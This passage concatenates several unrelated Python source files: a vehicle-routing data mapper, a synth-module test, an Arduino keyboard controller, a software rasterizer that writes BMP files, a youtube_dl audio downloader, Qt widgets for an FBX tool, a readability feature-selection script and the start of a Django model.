                    matrix[j][i] = matrix[i][j]
                except IndexError as e:
                    print("##ERROR!##\nBad indexing: " + str((i, j)))
                    print("that definitly shouldnt happen, it >might< be a problem with the imported file")
                    raise e
        return matrix
class DataMapper(object):
    """Turns raw Importer output into domain objects (Network + Fleet)."""

    def __init__(self, my_importer):
        # The minimal fleet size is encoded in the instance name (e.g. "-k5").
        try:
            minimal_fleet_size = retrieve_minimal_fleet_size(my_importer.info["NAME"])
        except AttributeError as e:
            print ("couldn't read minimal fleet size from the file name\n \
file might me corrupted, please fix it manually and retry")
            raise e
        self.info = my_importer.info
        self.network = self._create_network(my_importer.node_coordinates_list, my_importer.demand_array)
        self.fleet = self._create_fleet(my_importer.info["CAPACITY"], minimal_fleet_size)
        self.distance_matrix = my_importer.distance_matrix

    def _create_network(self, node_coordinates_list, demand_array):
        """Build the node network; node ids are 1-based, node 1 is the depot."""
        network = bo.Network()
        for id_, (node_coords, demand) in enumerate(zip(node_coordinates_list, demand_array)):
            node = bo.Node(id_ + 1, node_coords, demand)
            network.append_node(node)
        # The depot (node 1) is marked visited so routes never target it.
        network.get_node(1).visited = True
        return network

    def _create_fleet(self, capacity, number_of_vehicles=0):
        """Create `number_of_vehicles` vehicles of identical capacity."""
        vehicles_left = int(number_of_vehicles)
        capacity = int(capacity)
        fleet = bo.Fleet()
        while (vehicles_left):
            vehicle = bo.Vehicle(capacity)
            fleet.append_vehicle(vehicle)
            vehicles_left -= 1
        return fleet
|
from rv.api import m
def test_amplifier(read_write_read_synth):
    """Round-trip an Amplifier module through write/read and check each field survives."""
    mod: m.Amplifier = read_write_read_synth("amplifier").module
    assert mod.flags == 81
    assert mod.name == "amp"
    assert mod.volume == 378
    assert mod.balance == -63
    assert mod.dc_offset == -33
    assert mod.inverse
    assert mod.stereo_width == 44
    assert not mod.absolute
    assert mod.fine_volume == 21087
    assert mod.gain == 3948
|
#!/usr/bin/python
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# userful information :
# https://pyserial.readthedocs.io/en/latest/pyserial_api.html
# https://stackoverflow.com/questions/35642855/python3-pyserial-typeerror-unicode-strings-are-not-supported-please-encode-to
# https://pyfirmata.readthedocs.io/en/latest/https://pyfirmata.readthedocs.io/en/latest/
# http://yhhuang1966.blogspot.com/2017/04/python-arduino.html
# import library
from pyfirmata import Arduino, util
import sys, select, termios, tty
# setup the board
# NOTE(review): opening the serial port happens here at module load, before
# any key handling — requires the '/dev/arduino_uno' device alias to exist.
board = Arduino('/dev/arduino_uno')

# show information in terminal
msg = """
Control Your TurtleBot3!
---------------------------
Moving around:
w
a s d
x
w/x : increase/decrease linear velocity (Burger : ~ 0.22, Waffle and Waffle Pi : ~ 0.26)
a/d : increase/decrease angular velocity (Burger : ~ 2.84, Waffle and Waffle Pi : ~ 1.82)
space key, s : force stop
CTRL-C to quit
"""

# Message printed when communication with the board/terminal fails.
e = """
Communications Failed
"""
# setup keyboard input
def getKey():
    """Read one character without waiting for Enter; return '' after 0.1s with no input."""
    tty.setraw(sys.stdin.fileno())
    ready, _, _ = select.select([sys.stdin], [], [], 0.1)
    key = sys.stdin.read(1) if ready else ''
    # Restore the cooked-mode settings captured at startup so the terminal
    # stays usable between reads.
    termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
    return key
# control arduino
#board.digital[13].write(True)
if __name__=="__main__":
    # Save terminal settings so raw-mode changes made by getKey() can be undone.
    settings = termios.tcgetattr(sys.stdin)

    try:
        # print(...) works in both Python 2 and 3; the original bare
        # `print msg` statement was Python-2-only syntax.
        print(msg)
        while True:
            key = getKey()
            if key == 'h':
                board.digital[13].write(True)    # pin 13 high
            elif key == 'l':
                board.digital[13].write(False)   # pin 13 low
            elif key == '\x03':                  # CTRL-C
                break
    except Exception:
        # Narrowed from a bare `except:`; prints the "Communications Failed"
        # banner (the global string `e`), as before.
        print(e)
    finally:
        # Always restore the terminal, even on an unexpected exception.
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
|
# Graphics Library
from src.glTypes import V2, V3, V4, dword, newColor, word
from src.glMath import barycentricCoords, camTransform, createObjectMatrix, createRotationMatrix, dirTransform, divide, cross, dot, inv, negative, norm, substract, top, transformV3
from src.objLoader import Obj
BLACK = newColor(0, 0, 0)
WHITE = newColor(1, 1, 1)
class Renderer(object):
    """Software rasterizer: draws into a 2D pixel grid and writes it out as BMP."""

    # Constructor
    def __init__(self, width, height):
        self.curr_color = WHITE
        self.clear_color = BLACK
        self.glLookAt(V3(0,0,0), V3(0,0,-10))
        self.glCreateWindow(width, height)
        self.active_texture = None
        self.active_texture_2 = None
        self.normal_map = None
        self.active_shader = None
        self.directional_light = V3(0,0,-1)
        self.background = None

    def glCreateWindow(self, width, height):
        # Window size, fresh color/z buffers, full-window viewport.
        self.width = width
        self.height = height
        self.glClear()
        self.glViewPort(0, 0, width, height)

    def glViewPort(self, x, y, width, height):
        # NOTE(review): on out-of-range input these assign an Exception object
        # to the attribute instead of raising it — confirm this is intended.
        self.vpX = int(x) if x <= self.width else Exception('x is outside the window')
        self.vpY = int(y) if y <= self.height else Exception('y is outside the window')
        self.vpWidth = (width) if x + width <= self.width else Exception('viewport is outside the window')
        self.vpHeight = (height) if y + height <= self.height else Exception('viewport is outside the window')
        self.vpWidthMax = self.vpX + self.vpWidth
        self.vpHeightMax = self.vpY + self.vpHeight

        # NDC -> window transform; z is remapped from [-1, 1] to [0, 1].
        self.viewportMatrix = [[width/2, 0, 0, x + width/2],
                               [0, height/2, 0, y + height/2],
                               [0, 0, 0.5, 0.5],
                               [0, 0, 0, 1]]
        self.glProjectionMatrix()

    def glViewPortClear(self, color = None):
        # Paint every pixel of the viewport with `color` (or current color).
        for x in range(self.vpX, self.vpX + self.vpWidth):
            for y in range(self.vpY, self.vpY + self.vpHeight):
                self.glPoint(x, y, color)

    def glClearColor(self, r, g, b):
        self.clear_color = newColor(r, g, b)

    def glClear(self):
        # Creates a 2D pixels list and assigns a 3 bytes color for each value
        self.pixels = [ [self.clear_color for y in range(self.height)] for x in range(self.width) ]
        # Depth buffer starts at +inf so any drawn z wins the first compare.
        self.zBuffer = [ [ float('inf') for y in range(self.height) ] for x in range(self.width) ]

    def glClearBackground(self):
        # Sample the background texture across the viewport (tx, ty in [0, 1]).
        if self.background:
            for x in range(self.vpX, self.vpX + self.vpWidth):
                for y in range(self.vpY, self.vpY + self.vpHeight):
                    tx = (x - self.vpX) / self.vpWidth
                    ty = (y - self.vpY) / self.vpHeight
                    self.glPoint(x,y, self.background.getColor(tx, ty))

    def glColor(self, r, g, b):
        self.curr_color = newColor(r, g, b)

    def glLookAt(self, eye, camPosition = V3(0,0,0), worldUp=V3(0,1,0)):
        """Build the camera matrix from eye/target and derive the view matrix."""
        forward = substract(camPosition, eye)
        forward = divide(forward, norm(forward))
        right = cross(worldUp, forward)
        right = divide(right, norm(right))
        up = cross(forward, right)
        up = divide(up, norm(up))

        self.camMatrix = [[right[0],up[0],forward[0],camPosition.x],
                          [right[1],up[1],forward[1],camPosition.y],
                          [right[2],up[2],forward[2],camPosition.z],
                          [0,0,0,1]]
        # View matrix is the inverse of the camera matrix.
        self.viewMatrix = inv(self.camMatrix)

    def glProjectionMatrix(self, n = 0.1, f = 1000, fov = 60 ):
        # Perspective projection: n/f near/far planes, fov in degrees.
        t = top(fov, n)
        r = t * self.vpWidth / self.vpHeight
        self.projectionMatrix = [[n/r, 0, 0, 0],
                                 [0, n/t, 0, 0],
                                 [0, 0, -(f+n)/(f-n), -(2*f*n)/(f-n)],
                                 [0, 0, -1, 0]]

    def glVertex(self, x, y, color = None):
        """Plot a point given in NDC ([-1, 1] in both axes)."""
        if x < -1 or x > 1:
            return
        if y < -1 or y > 1:
            return
        # Calculate pixel respect to viewport
        pixelX = int((x+1) * ((self.vpWidth-1) / 2) + self.vpX)
        pixelY = int((y+1) * ((self.vpHeight-1) / 2) + self.vpY)
        self.pixels[int(pixelX)][int(pixelY)] = color or self.curr_color

    def glPoint(self, x, y, color = None):
        # if the point is not in the viewport, don't draw it
        if (x < self.vpX) or (x >= self.vpWidthMax) or (y < self.vpY) or (y >= self.vpHeightMax):
            return
        if (0 <= x < self.width) and (0 <= y < self.height):
            self.pixels[int(x)][int(y)] = color or self.curr_color

    def glLine(self, vertex0, vertex1, color = None, NDC = False, buffer = None):
        """Bresenham-style line; draws to `buffer` if given, else to the screen."""
        x0 = int((vertex0.x + 1) * (self.vpWidth / 2) + self.vpX) if NDC else vertex0.x
        x1 = int((vertex1.x + 1) * (self.vpWidth / 2) + self.vpX) if NDC else vertex1.x
        y0 = int((vertex0.y + 1) * (self.vpHeight / 2) + self.vpY) if NDC else vertex0.y
        y1 = int((vertex1.y + 1) * (self.vpHeight / 2) + self.vpY) if NDC else vertex1.y

        dx = abs(x1 - x0)
        dy = abs(y1 - y0)
        # Steep lines are stepped along y by swapping axes.
        steep = dy > dx
        if steep:
            x0, y0 = y0, x0
            x1, y1 = y1, x1
        rightToLeft = x0 > x1
        if rightToLeft:
            x0, x1 = x1, x0
            y0, y1 = y1, y0
        dx = abs(x1 - x0)
        dy = abs(y1 - y0)
        if dx == 0:
            return

        offset = 0
        limit = 0.5
        m = dy/dx
        y = y0
        for x in range(x0, x1 + 1):
            if steep:
                if (buffer != None):
                    buffer[y][x] = color or self.curr_color
                else:
                    self.glPoint(y, x, color)
            else:
                if (buffer != None):
                    buffer[x][y] = color or self.curr_color
                else:
                    self.glPoint(x, y, color)
            # Step y whenever the accumulated slope crosses the half-pixel line.
            offset += m
            if offset >= limit:
                y += 1 if y0 < y1 else -1
                limit += 1
        return buffer

    def glLoadModel(self, filename,
                    translate = V3(0,0,0), scale = V3(1,1,1), rotate = V3(0,0,0)):
        """Load an OBJ model and rasterize each face (tris and quads)."""
        model = Obj(filename)
        modelMatrix = createObjectMatrix(translate, scale, rotate)
        rotationMatrix = createRotationMatrix(rotate)

        # Vertical extent of the model, used elsewhere (e.g. by shaders).
        verticesY = [ x[1] for x in model.vertices ]
        self.minY = min(verticesY)
        self.maxY = max(verticesY)

        total = len(model.faces)
        count = 0
        for face in model.faces:
            print(f'face {count}/{total}')
            vertCount = len(face)
            vertices = [None] * vertCount
            textureV = [None] * vertCount
            triangleV = [None] * vertCount
            triangleVcam = [None] * vertCount
            normals = [None] * vertCount
            # OBJ indices are 1-based; gather positions/uvs/normals per vertex.
            for i in range(vertCount):
                vertices[i] = model.vertices[face[i][0]-1]
                textureV[i] = model.textcoords[face[i][1]-1] if self.active_texture else 0
                triangleV[i] = transformV3(vertices[i], modelMatrix)
                normals[i] = dirTransform(model.normals[face[i][2]-1], rotationMatrix)
            for i in range(vertCount):
                triangleVcam[i] = camTransform(triangleV[i], self.viewportMatrix, self.projectionMatrix, self.viewMatrix)
            self.glTriangleBarycentric(
                triangleVcam[0],triangleVcam[1],triangleVcam[2],
                textureCoords=(textureV[0], textureV[1], textureV[2]),
                vertices=(triangleV[0],triangleV[1],triangleV[2]),
                originalVertices=(vertices[0],vertices[1],vertices[2]),
                normals=(normals[0],normals[1],normals[2])
            )
            # Quads are split into two triangles (0,1,2) and (0,2,3).
            if vertCount == 4:
                self.glTriangleBarycentric(
                    triangleVcam[0],triangleVcam[2],triangleVcam[3],
                    textureCoords=(textureV[0], textureV[2], textureV[3]),
                    vertices=(triangleV[0],triangleV[2],triangleV[3]),
                    originalVertices=(vertices[0],vertices[2],vertices[3]),
                    normals=(normals[0],normals[2],normals[3])
                )
            count += 1

    def glLineInterceptor(self, buffer, width, height, left, bottom, points, colorFill, colorInterceptor):
        """Scanline fill over a local polygon buffer, using border crossings.

        NOTE(review): heuristic crossing rules (the interceptions < 2 and
        % 3 == 0 branches) — behavior verified only against glFillPolygon.
        """
        fill = False
        interceptions = 0
        newBuffer = buffer
        for y in range(1, height):
            for x in range(width):
                if (x == width-1):
                    if (newBuffer[x][y] == colorInterceptor):
                        interceptions += 1
                else:
                    # Toggle fill state on a border pixel followed by empty space.
                    if (newBuffer[x][y] == colorInterceptor and newBuffer[x+1][y] == False):
                        fill = not fill
                        interceptions += 1
                if (fill):
                    newBuffer[x][y] = colorFill
            # A row crossed fewer than twice cannot contain interior pixels.
            if (interceptions < 2):
                for x in range(width-1):
                    if (newBuffer[x][y] == colorFill):
                        newBuffer[x][y] = False
            elif (interceptions % 3 == 0):
                # Odd-crossing rows (e.g. through a vertex): re-walk the row
                # deciding fill state from border/vertex adjacency.
                fillTri = False
                notFillTri = False
                for x in range(1, width):
                    if (newBuffer[x-1][y] == colorFill and newBuffer[x][y] == colorInterceptor and (x+left, y+bottom) in points):
                        fillTri = True
                        notFillTri = False
                    if (newBuffer[x-1][y] == colorInterceptor and newBuffer[x][y] == colorFill and (x+left, y+bottom) in points):
                        notFillTri = True
                        fillTri = False
                    if (fillTri):
                        if (newBuffer[x-1][y] == colorFill and newBuffer[x][y] == colorFill and (x+left, y+bottom) not in points):
                            notFillTri = True
                            fillTri = False
                        if (fillTri):
                            newBuffer[x][y] = colorFill
                    if (notFillTri):
                        if (newBuffer[x-1][y] == False and newBuffer[x][y] == colorInterceptor):
                            fillTri = True
                            notFillTri = False
                        else:
                            newBuffer[x][y] = False
            # Reset per-row state.
            fill = False
            interceptions = 0
        return newBuffer

    def glFillPolygon(self, points, colorBorder = None , colorFill = None):
        """Draw and fill an arbitrary polygon given as a list of (x, y) points."""
        if colorBorder == None:
            colorBorder = self.curr_color
        if colorFill == None:
            colorFill = self.curr_color

        # Bounding box of the polygon.
        top = 0
        bottom = self.height
        left = self.width
        right = 0
        for i in range(len(points)):
            if points[i][0] < left:
                left = points[i][0]
            if points[i][0] > right:
                right = points[i][0]
            if points[i][1] > top:
                top = points[i][1]
            if points[i][1] < bottom:
                bottom = points[i][1]
        polygonHeight = top - bottom + 1
        polygonWidth = right - left + 1

        # Work in a local buffer translated so the bbox starts at (0, 0).
        polygonBuffer = [ [False for y in range(polygonHeight)] for x in range(polygonWidth) ]
        for i in range(len(points)):
            if i == len(points) - 1:
                polygonBuffer = self.glLine(V2(points[i][0] - left, points[i][1] - bottom), V2(points[0][0] - left, points[0][1] - bottom), color=colorBorder, buffer=polygonBuffer)
            else:
                polygonBuffer = self.glLine(V2(points[i][0] - left, points[i][1] - bottom), V2(points[i+1][0] - left, points[i+1][1] - bottom), color=colorBorder, buffer=polygonBuffer)

        polygonBuffer = self.glLineInterceptor(polygonBuffer, polygonWidth, polygonHeight, left, bottom, points, colorFill=colorFill, colorInterceptor=colorBorder)

        # Redraw the border in case filling overwrote border pixels.
        for i in range(len(points)):
            if i == len(points) - 1:
                polygonBuffer = self.glLine(V2(points[i][0] - left, points[i][1] - bottom), V2(points[0][0] - left, points[0][1] - bottom), color=colorBorder, buffer=polygonBuffer)
            else:
                polygonBuffer = self.glLine(V2(points[i][0] - left, points[i][1] - bottom), V2(points[i+1][0] - left, points[i+1][1] - bottom), color=colorBorder, buffer=polygonBuffer)

        # Remove stray fill pixels with no filled pixel directly below.
        for x in range(polygonWidth):
            for y in range(polygonHeight):
                if (polygonBuffer[x][y] == colorFill and polygonBuffer[x][y-1] == False):
                    polygonBuffer[x][y] = False

        # Blit the local buffer back into the framebuffer.
        for x in range(polygonWidth):
            for y in range(polygonHeight):
                if polygonBuffer[x][y] == colorBorder:
                    self.glPoint(x+left, y+bottom, color=colorBorder)
                elif polygonBuffer[x][y] == colorFill:
                    self.glPoint(x+left, y+bottom, color=colorFill)

    def glTriangleStandard(self, A, B, C, color = None):
        """Fill a triangle by splitting it into flat-bottom/flat-top halves."""
        # Sort so A has the highest y, then B, then C.
        if A.y < B.y:
            A, B = B, A
        if A.y < C.y:
            A, C = C, A
        if B.y < C.y:
            B, C = C, B

        def flatBottom(v1, v2, v3):
            # Scanline fill of a triangle whose bottom edge (v2-v3) is horizontal.
            try:
                d_v2_v1 = (v2.x - v1.x) / (v2.y - v1.y)
                d_v3_v1 = (v3.x - v1.x) / (v3.y - v1.y)
            except:
                pass
            else:
                x1 = v2.x
                x2 = v3.x
                for y in range(v2.y, v1.y + 1):
                    self.glLine(V2(int(x1), y), V2(int(x2), y), color=color)
                    x1 += d_v2_v1
                    x2 += d_v3_v1

        def flatTop(v1, v2, v3):
            # Scanline fill of a triangle whose top edge (v1-v2) is horizontal.
            try:
                d_v3_v1 = (v3.x - v1.x) / (v3.y - v1.y)
                d_v3_v2 = (v3.x - v2.x) / (v3.y - v2.y)
            except:
                pass
            else:
                x1 = v3.x
                x2 = v3.x
                for y in range(v3.y, v1.y + 1):
                    self.glLine(V2(int(x1), y), V2(int(x2), y), color=color)
                    x1 += d_v3_v1
                    x2 += d_v3_v2

        if B.y == C.y:
            # flat bottom
            flatBottom(A, B, C)
        elif A.y == B.y:
            # flat top
            flatTop(A, B, C)
        elif C.y == A.y:
            return  # avoid division by zero
        else:
            # Divide triangle and draw two triangles
            # intercept theorem: D lies on edge A-C at B's height
            D = V2(A.x + ((B.y - A.y) / (C.y - A.y)) * (C.x - A.x), B.y)
            flatBottom(A, B, D)
            flatTop(B, D, C)

    def glTriangleBarycentric(self, A, B, C, textureCoords = (), vertices = (), originalVertices = (), normals = (), color = None):
        """Rasterize a triangle with barycentric interpolation and z-buffering."""
        # Bounding box
        minX = round(min(A.x, B.x, C.x))
        minY = round(min(A.y, B.y, C.y))
        maxX = round(max(A.x, B.x, C.x))
        maxY = round(max(A.y, B.y, C.y))

        # Face normal from the (already transformed) triangle edges.
        triangleNormal = cross(substract(vertices[1], vertices[0]), substract(vertices[2], vertices[0]))
        triangleNormal = divide(triangleNormal, norm(triangleNormal))

        for x in range(minX, maxX + 1):
            for y in range(minY, maxY + 1):
                u, v, w = barycentricCoords(A, B, C, V2(x, y))
                # Inside the triangle iff all barycentric weights are >= 0.
                if u >= 0 and v >= 0 and w >= 0:
                    z = A.z * u + B.z * v + C.z * w
                    if 0 <= x < self.width and 0 <= y < self.height:
                        # Depth test; z clamped to the NDC [-1, 1] range.
                        if z < self.zBuffer[x][y] and z <= 1 and z >= -1:
                            if self.active_shader:
                                r, g, b = self.active_shader(self,
                                    vertices=vertices,
                                    baryCoords=(u,v,w),
                                    textureCoords=textureCoords,
                                    originalVertices=originalVertices,
                                    normals=normals,
                                    pixel=(x,y),
                                    triangleNormal = triangleNormal,
                                    color = color or self.curr_color)
                            else:
                                # Stored colors are BGR bytes; normalize to [0, 1].
                                b, g, r = color = self.curr_color
                                b /= 255
                                g /= 255
                                r /= 255
                            self.glPoint(x, y, newColor(r, g, b))
                            self.zBuffer[x][y] = z

    def glFinish(self, filename):
        # Creates a BMP file and fills it with the data inside self.pixels
        with open(filename, "wb") as file:
            # HEADER
            # Signature
            file.write(bytes('B'.encode('ascii')))
            file.write(bytes('M'.encode('ascii')))
            # FileSize in bytes
            file.write(dword(14 + 40 + (self.width * self.height * 3)))
            # Reserved
            file.write(dword(0))  # 0 = unused
            # DataOffset
            file.write(dword(14 + 40))  # from beginning of file to the beginning of bitmap data

            # INFO HEADER
            # Size
            file.write(dword(40))  # 40 = size of info header
            # Width
            file.write(dword(self.width))
            # Height
            file.write(dword(self.height))
            # Planes
            file.write(word(1))  # number of planes
            # Bits per pixel
            file.write(word(24))  # 24 = 24bit RGB. NumColors = 16M
            # Compression
            file.write(dword(0))  # 0 = BI_RGB no compression
            # ImageSize
            file.write(dword(self.width * self.height * 3))
            # XpixelsPerM
            file.write(dword(0))
            # YpixelsPerM
            file.write(dword(0))
            # Colors Used
            file.write(dword(0))
            # Important Colors
            file.write(dword(0))  # 0 = all

            # COLOR TABLE
            # BMP rows are written bottom-up, which matches iterating y first.
            for y in range(self.height):
                for x in range(self.width):
                    file.write(self.pixels[x][y])
|
#####don't use remove function
# list1=["swati","rani","srusti"]
# i=0
# list2=[]
# while i<1:
# m=list1[i]
# list2.append(list1[0])
# list2.append(list1[2])
# i=i+1
# print(list2)
|
import youtube_dl
def downloadFunction(self):
    """Prompt for a YouTube URL and download its audio as a 192 kbps mp3."""
    options = {
        'format': 'bestaudio/best',
        'postprocessors': [{
            'key': 'FFmpegExtractAudio',
            'preferredcodec': 'mp3',
            'preferredquality': '192',
        }],
        # Save into the user's Music folder, named after the video title.
        'outtmpl': '/home/benjamin/Music/%(title)s.%(ext)s',
    }
    with youtube_dl.YoutubeDL(options) as downloader:
        link = input("Paste youtube song link: ")
        downloader.download([link])
|
'''
@author: Bren
'''
from brenpy.qt.bpQtImportUtils import QtCore
from brenpy.qt.bpQtImportUtils import QtWidgets
from brenpy.qt.bpQtImportUtils import QtGui
from brenpy.core import bpDebug
from brenpy.qt import bpQtWidgets
from brenfbx.core import bfCore
from brenfbx.qt import bfQtCore
from brenfbx.fbxsdk.core import bfObject
DEFAULT_LABEL_WIDTH = 50
class BfQWidgetBase(
    bfCore.BfManagerBase,
    # bfObject.BfCustomObjectManagerBase,
    bpQtWidgets.BpWidgetBase,
):
    """Mixin base for brenfbx Qt widgets.

    Verifies at construction that the widget's environment is the Qt-aware
    BfQtEnvironment, and exposes that environment's widget mapping.
    """

    def __init__(self, *args, **kwargs):
        super(BfQWidgetBase, self).__init__(*args, **kwargs)

        # check environment
        # Fail fast: widget_mapping() below requires the Qt environment.
        if not isinstance(self.bf_environment(), bfQtCore.BfQtEnvironment):
            raise bfQtCore.BfQtError("BfQtWidgetBase must be instanced with {} not {}".format(
                bfQtCore.BfQtEnvironment, self.bf_environment()
            ))

    def widget_mapping(self):
        # Delegates to the environment's mapping (defined in bfQtCore).
        return self.bf_environment().widget_mapping()
class BfQWidget(
    BfQWidgetBase,
    QtWidgets.QWidget
):
    """Simple QWidgets subclass to enforce the use of a single fbx_manager.

    To avoid fbx errors.

    TODO migrate all classes to use this and track fbx_manager
    """

    def __init__(self, *args, **kwargs):
        super(BfQWidget, self).__init__(*args, **kwargs)
class BfQMainWindow(
    BfQWidgetBase,
    QtWidgets.QMainWindow
):
    """Simple QMainWindow subclass to enforce the use of a single fbx_manager.

    To avoid fbx errors.
    """

    def __init__(self, *args, **kwargs):
        super(BfQMainWindow, self).__init__(*args, **kwargs)
class BfQDialog(
    BfQWidgetBase,
    QtWidgets.QDialog
):
    """Simple QDialog subclass to enforce the use of a single fbx_manager.

    To avoid fbx errors.

    TODO migrate all classes to use this and track fbx_manager
    """

    def __init__(self, bf_environment, **kwargs):
        # NOTE: unlike the sibling classes, this takes bf_environment
        # positionally rather than via *args.
        super(BfQDialog, self).__init__(bf_environment, **kwargs)
class BfTreeView(
    BfQWidgetBase,
    bpQtWidgets.BpQViewBase,
    QtWidgets.QTreeView
):
    """Tree view bound to the shared fbx environment."""

    def __init__(self, *args, **kwargs):
        super(BfTreeView, self).__init__(*args, **kwargs)

        # self.setSelectionMode(
        #     QtWidgets.QAbstractItemView.ExtendedSelection
        # )
        # self.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
class BfMappedWidget(QtWidgets.QWidget):
    """Base widget whose child editors are bound to a model row via
    QDataWidgetMapper. Subclasses implement _create_widgets,
    _create_layout, add_mappings and clear_widgets.

    TODO migrate to brenpy
    """

    def __init__(self, parent=None):
        super(BfMappedWidget, self).__init__(parent)

        self._mapped = False  # mappings are added lazily on first selection
        self._data_mapper = QtWidgets.QDataWidgetMapper()

        self.setFixedHeight(20)

        self._create_widgets()
        self._create_layout()

    def _create_widgets(self):
        # Subclass hook: instantiate child widgets.
        pass

    def _create_layout(self):
        # Subclass hook: lay out child widgets.
        pass

    def setModel(self, model):
        self.model = model
        self._data_mapper.setModel(self.model)
        # self.map_to_index()

    def add_mappings(self):
        # Subclass hook: register widget <-> model-column mappings.
        pass
        # self.data_mapper.toFirst()

    def setSelection(self, index):
        """Point the mapper at `index`; invalid indices clear the widget."""
        if not index.isValid():
            self.clear()
            return

        if not self._mapped:
            self.add_mappings()
            self._mapped = True

        self._data_mapper.setRootIndex(index.parent())
        self._data_mapper.setCurrentModelIndex(index)

    def clear(self):
        # Drop all mappings so stale model data is not shown.
        self._data_mapper.clearMapping()
        self._mapped = False
        self.clear_widgets()

    def clear_widgets(self):
        # Subclass hook: reset child widgets to their empty state.
        pass

    def get_current_index(self):
        """Return the model index the mapper is currently bound to."""
        parent_index = self._data_mapper.rootIndex()
        row = self._data_mapper.currentIndex()
        index = self.model.index(row, 0, parent_index)
        return index
class BfObjectNameWidget(BfMappedWidget):
    """Mapped widget showing an object's name in a line edit (column 0).

    TODO if index is not editable, set line edit to be not editable.
    """

    def __init__(self, parent=None):
        super(BfObjectNameWidget, self).__init__(parent)

    def _create_widgets(self):
        self._label = QtWidgets.QLabel("Name")
        self._label.setFixedWidth(DEFAULT_LABEL_WIDTH)
        self._line_edit = QtWidgets.QLineEdit()
        self._line_edit.setEnabled(False)

    def _create_layout(self):
        self.lyt = QtWidgets.QHBoxLayout()
        self.lyt.setContentsMargins(0, 0, 0, 0)
        for child in (self._label, self._line_edit):
            self.lyt.addWidget(child)
        self.setLayout(self.lyt)

    def add_mappings(self):
        # Enable editing only while a mapping is active.
        self._line_edit.setEnabled(True)
        self._data_mapper.addMapping(self._line_edit, 0)
        self._data_mapper.toFirst()

    def clear_widgets(self):
        self._line_edit.setText("")
        self._line_edit.setEnabled(False)
class BfObjectTypeWidget(BfMappedWidget):
    """Mapped widget showing an object's type as an icon plus a text label."""

    def __init__(self, parent=None):
        super(BfObjectTypeWidget, self).__init__(parent)

    def _create_widgets(self):
        self.type_label = QtWidgets.QLabel("Type")
        self.pixmap_label = QtWidgets.QLabel()
        self.text_label = QtWidgets.QLabel()
        self.type_label.setFixedWidth(DEFAULT_LABEL_WIDTH)
        self.pixmap_label.setFixedWidth(20)

    def _create_layout(self):
        self.lyt = QtWidgets.QHBoxLayout()
        self.lyt.setContentsMargins(0, 0, 0, 0)
        self.lyt.addWidget(self.type_label)
        self.lyt.addWidget(self.pixmap_label)
        self.lyt.addWidget(self.text_label)
        self.setLayout(self.lyt)

    def add_mappings(self):
        # Column 2 supplies the icon (via the "pixmap" property),
        # column 1 the type name (via the "text" property).
        self._data_mapper.addMapping(self.pixmap_label, 2, "pixmap")
        self._data_mapper.addMapping(self.text_label, 1, "text")

    def clear_widgets(self):
        self.text_label.setText("")
        # Bug fix: QLabel.setPixmap(None) raises TypeError under PyQt5;
        # QLabel.clear() is the portable way to remove the pixmap.
        self.pixmap_label.clear()
|
# encoding: utf-8
#@author: newdream_daliu QQ:279129436
#@file: __init__.py.py
#@time: 2021-05-06 16:01
#@desc:
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author:nieh
@file: main.py
@time: 2018/03/26
"""
from __future__ import division
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import f_classif
from sklearn import preprocessing
from utils.utils import *
from Features import Feature
import os
import numpy as np
import warnings
import sklearn.exceptions
warnings.filterwarnings('ignore', category=sklearn.exceptions.UndefinedMetricWarning)
warnings.filterwarnings('ignore', category=DeprecationWarning)
if __name__ == "__main__":
    # Path where the corpus is stored (renjiaoban / fine-grained set).
    path = '/home1/nh/projects/Readability_v2/data/fine_grained/renjiaoban'
    word_dict, char_dict, stroke_dict = construct_dict()
    feature = Feature(word_dict, char_dict, stroke_dict, path)

    if not os.path.exists('npy/fine_grained/rjb'):
        os.makedirs('npy/fine_grained/rjb')
    os.chdir('npy/fine_grained/rjb')

    # Build the cached feature matrices on first run, then load them
    # (the two branches of the original if/else were identical apart from
    # the save_dataset() call).
    if not (os.path.exists('X_ltp.npy') and os.path.exists('Y_ltp.npy')):
        feature.save_dataset()
    print('分词模式:ltp segmentor')
    X = np.load('X_ltp.npy')
    Y = np.load('Y_ltp.npy')
    print('dataset loaded successfully!')
    os.chdir('../../../')

    # Report the number of samples per grade label (sorted for
    # deterministic output; set iteration order is arbitrary).
    target_list = Y.tolist()
    for grade in sorted(set(target_list)):
        print(grade, target_list.count(grade))

    # Scale features to [0, 1] and rank them with ANOVA F-scores.
    min_max_scaler = preprocessing.MinMaxScaler()
    X_scaled = min_max_scaler.fit_transform(X)
    selector = SelectKBest(f_classif, k=10)
    selector.fit(X_scaled, Y)
    # Bug fix: the Python 2 print statement made this otherwise
    # Python 3 compatible script a syntax error under Python 3.
    print(selector.scores_)
from django.db import models
from users.models import UserAccount
# Create your models here.
class Tweet(models.Model):
    """A tweet posted by a user account."""

